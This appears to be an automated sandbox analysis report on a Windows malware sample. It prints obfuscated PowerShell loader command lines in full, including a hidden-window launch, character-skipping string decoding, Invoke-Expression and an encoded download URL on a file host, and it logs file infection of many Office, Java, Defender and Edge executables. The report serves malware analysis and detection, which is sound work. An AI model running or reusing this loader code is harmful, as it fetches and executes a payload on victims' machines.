              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fuldendende)$global:Elaphurus15 = [System.Text.Encoding]::ASCII.GetString($Fireogtyves)$global:Eksilleder230=$Elaphurus15.substring($Genindkalder112,$Uncharge)<#Dusrjger Headstay Opb
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Detunes $reabandoned $Hydroquinol), (Repartitionens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Athogen = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($knoglemarvs)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Fodor, $false).DefineType($forlenet, $Snappe2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fuldendende)$global:Elaphurus15 = [System.Text.Encoding]::ASCII.GetString($Fireogtyves)$global:Eksilleder230=$Elaphurus15.substring($Genindkalder112,$Uncharge)<#Dusrjger Headstay Opb
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Ame
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. 
karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cI
              Source: AppVDllSurrogate.exe.9.dr | Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
              Source: jucheck.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x138baf
              Source: VSTOInstaller.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x23068
              Source: lyncicon.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0xea647
              Source: chrome.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x2c9d6
              Source: ai.exe0.9.dr | Static PE information: real checksum: 0x8a074 should be: 0xa200f
              Source: grv_icons.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x646fd
              Source: ai.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0xc328b
              Source: MpDlpCmd.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x74f87
              Source: integrator.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x44ae38
              Source: Aut2exe.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x1997a9
              Source: Au3Info_x64.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x49bdd
              Source: PerfBoost.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x6ed59
              Source: joticon.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0xbd8e2
              Source: MpCmdRun.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x19b52e
              Source: aimgr.exe0.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x2e51b
              Source: SQLDumper.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x49b60
              Source: Au3Check.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x4ace1
              Source: AppSharingHookController64.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x20765
              Source: Aut2exe_x64.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x1c7652
              Source: Microsoft.Mashup.Container.Loader.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x218c6
              Source: AutoIt3Help.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x2942f
              Source: Uninstall.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x1d811
              Source: armsvc.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x38ee8
              Source: officeappguardwin32.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x1ea61e
              Source: jusched.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0xc76e3
              Source: AppVDllSurrogate32.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x3d892
              Source: javaws.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x6c99c
              Source: OcPubMgr.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x182a45
              Source: msoev.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x268d3
              Source: accicons.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x4235e8
              Source: mpextms.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0xee9bf
              Source: jaureg.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x95cbf
              Source: OfficeScrSanBroker.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0xc392a
              Source: javaw.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x5043b
              Source: OfficeScrBroker.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0xa8883
              Source: MsMpEng.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x39d03
              Source: aimgr.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x3b0de
              Source: SciTE.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x25609f
              Source: java.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x5013a
              Source: Au3Info.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x3d6d8
              Source: ConfigSecurityPolicy.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x8624f
              Source: MpCopyAccelerator.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x3e54a
              Source: OLicenseHeartbeat.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0xb8fc4
              Source: AutoIt3_x64.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x11706f
              Source: MpCmdRun.exe0.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x146cda
              Source: UcMapi.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x132706
              Source: Wordconv.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x1f925
              Source: AdobeARMHelper.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x64c50
              Source: Common.DBConnection.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x2153c
              Source: SDXHelper.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x38c81
              Source: upx.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x5c64b
              Source: GoogleCrashHandler.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x60b44
              Source: NisSrv.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x307019
              Source: AppVDllSurrogate.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x3d892
              Source: VC_redist.x64.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0xaff0b
              Source: AppSharingHookController.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x25428
              Source: GoogleCrashHandler64.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x739bf
              Source: Integrator.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x44ae38
              Source: AppVLP.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x710ec
              Source: AppVDllSurrogate64.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x4ec22
              Source: dbcicons.exe.9.dr | Static PE information: real checksum: 0x8a074 should be: 0x2bad0
              Source: AppVDllSurrogate.exe.9.dr | Static PE information: section name: .didat
              Source: msoev.exe.9.dr | Static PE information: section name: .didat
              Source: OcPubMgr.exe.9.dr | Static PE information: section name: .didat
              Source: officeappguardwin32.exe.9.dr | Static PE information: section name: .didat
              Source: AppVDllSurrogate32.exe.9.dr | Static PE information: section name: .didat
              Source: OfficeScrBroker.exe.9.dr | Static PE information: section name: .didat
              Source: AppVDllSurrogate64.exe.9.dr | Static PE information: section name: .didat
              Source: OfficeScrSanBroker.exe.9.dr | Static PE information: section name: .didat
              Source: AppVLP.exe.9.dr | Static PE information: section name: .didat
              Source: Integrator.exe.9.dr | Static PE information: section name: .didat
              Source: Microsoft.Mashup.Container.Loader.exe.9.dr | Static PE information: section name: .didat
              Source: AppSharingHookController.exe.9.dr | Static PE information: section name: .didat
              Source: Common.DBConnection.exe.9.dr | Static PE information: section name: .didat
              Source: PerfBoost.exe.9.dr | Static PE information: section name: .didat
              Source: SDXHelper.exe.9.dr | Static PE information: section name: .didat
              Source: chrome.exe.9.dr | Static PE information: section name: .didat
              Source: MpCmdRun.exe.9.dr | Static PE information: section name: .didat
              Source: MpDlpCmd.exe.9.dr | Static PE information: section name: .didat
              Source: mpextms.exe.9.dr | Static PE information: section name: .didat
              Source: MsMpEng.exe.9.dr | Static PE information: section name: .didat
              Source: NisSrv.exe.9.dr | Static PE information: section name: .didat
              Source: MpCmdRun.exe0.9.dr | Static PE information: section name: .didat
              Source: VC_redist.x64.exe.9.dr | Static PE information: section name: .didat
              Source: UcMapi.exe.9.dr | Static PE information: section name: .didat
              Source: Wordconv.exe.9.dr | Static PE information: section name: .didat
              Source: ai.exe.9.dr | Static PE information: section name: .didat
              Source: aimgr.exe.9.dr | Static PE information: section name: .didat
              Source: integrator.exe.9.dr | Static PE information: section name: .didat
              Source: ConfigSecurityPolicy.exe.9.dr | Static PE information: section name: .didat
              Source: MpCopyAccelerator.exe.9.dr | Static PE information: section name: .didat
              Source: Au3Check.exe.9.dr | Static PE information: section name: .didat
              Source: Au3Info.exe.9.dr | Static PE information: section name: .didat
              Source: Au3Info_x64.exe.9.dr | Static PE information: section name: .didat
              Source: Aut2exe.exe.9.dr | Static PE information: section name: .didat
              Source: Aut2exe_x64.exe.9.dr | Static PE information: section name: .didat
              Source: upx.exe.9.dr | Static PE information: section name: .didat
              Source: AutoIt3Help.exe.9.dr | Static PE information: section name: .didat
              Source: ai.exe0.9.dr | Static PE information: section name: .didat
              Source: aimgr.exe0.9.dr | Static PE information: section name: .didat
              Source: AutoIt3_x64.exe.9.dr | Static PE information: section name: .didat
              Source: SciTE.exe.9.dr | Static PE information: section name: .didat
              Source: Uninstall.exe.9.dr | Static PE information: section name: .didat
              Source: AdobeARMHelper.exe.9.dr | Static PE information: section name: .didat
              Source: armsvc.exe.9.dr | Static PE information: section name: .didat
              Source: jaureg.exe.9.dr | Static PE information: section name: .didat
              Source: jucheck.exe.9.dr | Static PE information: section name: .didat
              Source: jusched.exe.9.dr | Static PE information: section name: .didat
              Source: VSTOInstaller.exe.9.dr | Static PE information: section name: .didat
              Source: OLicenseHeartbeat.exe.9.dr | Static PE information: section name: .didat
              Source: AppSharingHookController64.exe.9.dr | Static PE information: section name: .didat
              Source: SQLDumper.exe.9.dr | Static PE information: section name: .didat
              Source: accicons.exe.9.dr | Static PE information: section name: .didat
              Source: dbcicons.exe.9.dr | Static PE information: section name: .didat
              Source: grv_icons.exe.9.dr | Static PE information: section name: .didat
              Source: joticon.exe.9.dr | Static PE information: section name: .didat
              Source: lyncicon.exe.9.dr | Static PE information: section name: .didat
              Source: java.exe.9.dr | Static PE information: section name: .didat
              Source: javaw.exe.9.dr | Static PE information: section name: .didat
              Source: javaws.exe.9.dr | Static PE information: section name: .didat
              Source: GoogleCrashHandler.exe.9.dr | Static PE information: section name: .didat
              Source: GoogleCrashHandler64.exe.9.dr | Static PE information: section name: .didat
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F174FB push ebx; iretd 2_2_00007FF848F1756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F1756B push ebx; iretd 2_2_00007FF848F1756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F100BD pushad ; iretd 2_2_00007FF848F100C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7A58D pushad ; ret 6_2_04E7A59B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7A56A pushad ; ret 6_2_04E7A56B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7A518 pushad ; ret 6_2_04E7A53B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7E3B0 push eax; retf 6_2_04E7E3B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7AFD5 push ebp; ret 6_2_04E7B033
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7AFB5 push esi; ret 6_2_04E7AFD3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7AF85 push esi; ret 6_2_04E7AF93
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E70F88 push eax; ret 6_2_04E70F92
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7AF95 push ebp; ret 6_2_04E7B033
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7AF65 push esi; ret 6_2_04E7AF83
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7AF62 push esi; ret 6_2_04E7AF63
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E70F68 push eax; ret 6_2_04E70F72
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E70F78 push eax; ret 6_2_04E70F82
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E70F5D push eax; ret 6_2_04E70F62
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E76920 pushfd ; ret 6_2_04E76933
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7F72D push cs; ret 6_2_04E7F73B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7B0E5 push esp; ret 6_2_04E7B133
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7B0D5 push ebp; ret 6_2_04E7B0E3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7B0B5 push ebp; ret 6_2_04E7B0D3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7B085 push ebp; ret 6_2_04E7B093
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7B065 push ebp; ret 6_2_04E7B083
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7B062 push ebp; ret 6_2_04E7B063
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7B035 push esp; ret 6_2_04E7B133
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7B035 push esp; ret 6_2_04E7B173
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E7B162 push esp; ret 6_2_04E7B163
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_07A50638 push eax; mov dword ptr [esp], ecx 6_2_07A50AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_07A50AB8 push eax; mov dword ptr [esp], ecx 6_2_07A50AC4

              Persistence and Installation Behavior

              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Windows\svchost.com
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
